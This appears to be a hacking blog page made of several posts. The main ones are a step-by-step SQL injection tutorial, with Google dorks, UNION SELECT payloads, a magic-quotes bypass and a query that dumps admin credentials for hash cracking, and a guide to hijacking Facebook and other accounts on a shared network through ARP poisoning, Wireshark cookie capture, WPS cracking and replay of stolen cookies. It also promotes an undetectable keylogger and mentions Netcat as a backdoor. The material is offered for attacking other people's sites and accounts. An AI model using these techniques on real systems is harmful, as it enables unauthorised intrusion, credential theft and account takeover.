Website Hacking: How to find a vulnerable Website?? Part 2

As we had discussed about basic information of website hacking in my last article.Today i am writing article on "How to find a vulnerable Website using Dork???" Now a days Website Hacking has become a tradition or fun to create problems for other people. Hackers are searching for finding the holes in the websites having high page ranks and traffic. 

Today in this article, I am going to teach you how to find website vulnerablility using Dork. Here i have shared some Dorks which you can use to fine vulnerable Website through google.

If you have not read part 1 I strongly recommend you do: Website Hacking: Basic Information About Website Hacking Part 1

          How to find a vulnerable Website Using Dork?

What is an SQL Injection?

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

How do I know if the site is vulnerable?

Well, the most basic way to do it, and the easiest, would be to use an SQLi Scanner, such as Acunetix Web Vulnerability Scanner

Alternatively, you can search manually using something called a "Dork".

So what is a dork?

A dork is a simple search used on google ( or other search engines ) that brings up sites you are specifically looking for.

List of Google Dork:

                                 inurl:index.php?id=

                                 inurl:trainers.php?id=

                                 inurl:buy.php?category=

                                 inurl:article.php?ID=

                                 inurl:play_old.php?id=

                                 inurl:declaration_more.php?decl_id=

                                 inurl:Pageid=

                                 inurl:games.php?id=

                                 inurl:page.php?file=

                                 inurl:historialeer.php?num=

Using the manual method will take a lot of trial and error.

Once you have your site, to check if it is vulnerable, simply add an apostrophe ( ' ) to the end of the url. 

Example:

                  http://www.examplesite.com/category.php?id=5'

If the site is vulnerable, you will see the following error or something similar somewhere on the page.

" Error executing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY date_added DESC' at line 1 "

If you get this, the site should be vulnerable. So far so good!

How many columns?

Our next step is to find the number of columns in the database. To do this we use the ORDER BY query. We get our normal site URL, and add ORDER BY 1-- to the end of it. Example:

Quote:

http://www.examplesite.com/category.php?id=5 order by 1--

The page should then show up as normal. Now we have to increase this number until we get an error.

Quote:

http://www.examplesite.com/category.php?id=5 order by 1-- No error

http://www.examplesite.com/category.php?id=5 order by 2-- No error

http://www.examplesite.com/category.php?id=5 order by 3-- Error

We got an error on 3, so that means our number of columns is 2 (The max column number before getting an error).

Union Select Query

We use the union select statement to combine the results of multiple querys in our SQLi. To test if it works, go to our sites normal URL, and write "union select 1,2--" (without quotes) after it. In our example, we use 1,2--, but on other sites, you will usually have a different number of columns. Example: On a site with 5 columns it would be "union select 1,2,3,4,5--".

Quote:

http://www.examplesite.com/category.php?id=-5 union select 1,2--

Notice that there is a - in front of the 5. This is done to remove all text from the webpage, so we can see the results of our query on the page (Explanation. There isn't a -5 page anywhere on the site, so it uses the usual site template, but without the images and text of that specific page).

If union select worked, we should have no SQL errors. We also should now see a few numbers on the page that normally aren't there. For our example, we will say that both 1 and 2 showed up on our page.

What SQL Version does my site use?

This will be one of the easier things to do. After we have tested union (and it works!) we simply input "version()" in to one of the numbers in our URL, but these numbers have to be visible on the page, otherwise we won't be able to see the returned query result. Example:

Quote:

http://www.examplesite.com/category.php?id=-5 union select 1,version()--

This will replace the number 2 on our page with the SQL version. For our example we will use version 5 and above.

Finding table names

Now we are going to get into the tables. This is where all the information you are looking for will be kept, but first, we need to find the table names. To do so, replace version() with group_concat(table_name). Then after your last column number, add from information_schema.tables--. Example:

Quote:

http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(table_name) from information_schema.tables--

On the page you should now have a list of all the table names in the database.

Finding the column names

To find the column names we do the same thing, but replace tables with columns, but we include which table to get the column names from. If we found a table called admin. Example,

Quote:

http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--

Q: I get an error when I do this, or no column names are shown!

A: Magic quotes is on. To bypass this, you must convert the table name to Hex.

You can do this by going to http://www.swingnote.com/tools/texttohex.php . Our query would now look like this:

Quote:

http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e --

Note: the 0x tells the computer the following string is in hex.

Lets say the column names were username and password.

Final Step: Getting our information.

To finish it off, we want to find out what the columns contain, otherwise, this has all been for nothing! To do so we get our normal site URL and add "union select 1,concat(username,0x3a,password) from admin--".

This will show the username and password from the table admin! Usually your password will be a hash, so you can use an online MD5 Cracker such as MD5Crack or use a program such as Cain and Abel to decrypt the password hash.

Keylogger: Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use best Hacking software- Winspy Keylogger which is FUD(Fully UnDetectable).

So friends, I hope you will like this

Enjoy Website Hacking ........

Website Hacking: Basic Information About Website Hacking Part 1

Website security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating alot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.

Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available such as SQL Injection through which even a newbie can find a vulnerable site and start Hacking in just few minutes.

What is a website hacking?

The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not too much different from your home PC, except that its configuration is specialized for making files available to the world wide web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.

With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.

Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.

A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CD's, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.

People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"

The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.

Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.

Who are the hackers?

Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.

Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another, and somewhere way back in the chain is a programmer who initially unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet", a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need to have as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.

Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.

And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.

Why do they do it? What do they want?

• Your visitors' confidential financial information. They want credit card and Social Security numbers, FTP passwords, website logins, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.
1. Theft methods:
2. They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.
3. They copy your customer database.
4. They install spyware or phishing pages in your site, to grab data as your customers log in.
• Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PC's.
• Your mail server, for sending spam.
• Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.
• Free use of your server's processing power, to reprogram however they want.
• Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees, electricity bills, and can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months.
Examples:
1. Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.
2. Illegal pornographic content.
3. Use your webspace to store PHP or Perl scripts like c99 or r57 for use in Remote File Inclusion (RFI) attacks on other sites, making your site look like the attacker.
• Your traffic. They put visible links on your pages that visitors on your site can follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.
• Your money, by extortion, threatening to launch a worse attack against your site if you don't pay them.
• Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.
• Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.

Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:

SQL Injection
Cross Site Scripting (XSS)
Remote File Inclusion(RFI)
Local File inclusion(LFI)
Directory Traversal
Cross-site request forgery( CSRF )
SSI Injection
LDAP Injection
XPath Injection
Denial of Service - DOS Attacks

In this article, I have just shared basic information on Hacking Website.I will cover the method to hack website in the next post, So stay tuned !.

Website Hacking: How to find a vulnerable Website?? Part 2

NetCat - Tutorial

Netcat:
            NetCat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat has various features and thus commonly referred as Swiss army knife of Tcp/Ip , Netcat is Cross platform and its  mainly used by hackers for Banner grabbing , Port scanning , Used as A backdoor and for proxying it has many features that can come handy in our day to day life.
In today's post i will be explaining the various features and uses of Netcat, Netcat can be used to do the following things..


1. Chatting
2. Port scanning
3. Banner Grabbing
4. Used for remote administration (Can be used as Backdoor )
5. File transferring

Hope this will help you. 

Hack A Facebook Account In Same Network

First off i need to say that this will NOT steal anyones password unless they log in while you are monitoring them. This will however give you their cookies which you can use to steal there session and have full acess to their account. This will work for Facebook, a lot of emails (sorry no gmail), and just about any forum (except this one). If you are familiar with SSLstrip you can use this method to hijack any session (paypal, bank websites, any email, etc.)

Wireshark Software to capture cookies:

Wireshark is the best free packet sniffer software available today. Actually, it was developed for making a network secure. But, the same software is now used by hackers to test for vulnerability and security loopholes in the network and to attack the network accordingly. Cookie stealing being one of the types of hacks implemented using this Wireshark software.

Requirements:

Cain and Abel : Download Here
Wireshark : Download Here
Firefox 3 (or one compatable with add n edit) : Download Here
Add n Edit (cookie editor for firefox) : Download Here
Acess to the network with user you want to hack
Network traffic



and also you can use greasemonkey Add-on

Prerequisites:

                             Download and install all above programs. To add "Add n Edit" to your browser just open firefox, go to tools, then click add-ons. you can drag and drop the program from wherever you saved it into the little box that popped up and install it from there. 

Below, I have listed steps on how to capture Facebook and other accounts cookies. This will help you to know how Wireshark and Cain-Abel can be used to sniff packets and capture cookies.

First: Gain acess to the Network. Open networks or your own network would be easy but if you have a specific slave you want you should be able to gain acess using Backtrack. 

Tip: use reaver to exploit WPS for WPA/WPA2 encryptions, WEPs are easy to crack given time and OPN means there is no password.

Second: Right click Cain and choose 'run as administrator.' on the top bar go to 'configure' and be sure to select your wireless card/adapter. now click where it says 'Sniffer' then this litte button towards the top left:

Next click any empty white box then the blue "+" symbol near the button you pressed just before. choose okay
should look like this:

these are all the devices it was able to detect.


now we go to APR on the bottom bar. Once again click any empty white box then the blue cross. It's easiest to just go one by one and choose all possibilities.

now we have to poison them so we choose the little yellow hazard symbol towards the top left. should now look like this:

we are done here, just minimize Cain for now.

Third: Run wireshark as administrator. On the top bar choose 'Capture' then 'Interfaces.' Here you will have to choose your interface that is connected to the Network we are sniffing from. if you wait a few seconds you might see some traffic being collected as seen in my photo, just choose that interface b/c thats most likely it.

Wireshark will list and color-code all the traffic it sees for you. To make this simpler we can use the filter to only see the traffic we want, Type "http.cookie" in the filter. (Something to consider is to just filter to "http" and scroll through the entries looking for ones that start with the word "POST" this means that information was submitted to the webpage noted such as a username and a password! so if you see this just look through the details and you should see the info you want, most passwords will be hashed but use this site to decript them: http://www.md5decrypter.co.uk/ )

here is an image:

You can either look through this information manually or use the search function to find what you want. In my case i want to hijack the session of a user on the forum freerainbowtables.com so i will use the search function (press Ctrl+F, or go to edit -> search) and type in the information i know for sure will be in the entry. if your hijacking someones facebook put 'facebook' there. Most of the time to be safe i do not use the first entry i see b/c this will only work if the person is auto logged in, so just go down a few more until you see one you think will work (just use common sense).

What we need are the cookies. Here are what mine look like and how to get there. With practice you will be able to tell which cookies are used for logins and be able to limit failed attempts.

copy the cookies as value and save them into a notepad (shown in pic above). I would suggest to seperate everywhere you see a ";" bc this suggests that is the begining of the next entry. The text to the left of the = is the name of the cookie and the text to the right is its value.

Third: Open up your firefox browser with Add n Edit enabled. You can get to your add ons by going to tools and they should all be listed in the drop down tab. First go to the website you are hijjacking the session from then open your cookie editor. Should look something like this:

The last thing to do is to change your cookies to match the ones you captured. If the cookies given to you by the site expire (like the ones in my picture do) you will have to delete them and add all the ones we captured earlier in. if they do not expire you can just edit them. Bottom line is all the cookies must match the cookies you captures in the earlier steps EXACTLY! Make sure you do not add any extras and that you did not miss anything. Also all fields must be filled in (Path and Domain as well as Name and Value). My path is "/" and my domain is ".freerainbowtables.com"
mine looks like this:

You are now done, Just close the cookie editor and reload the webpage. If done correctly with the correct cookies you should be logged in as the user you attacked! 

Enjoy hacking.!!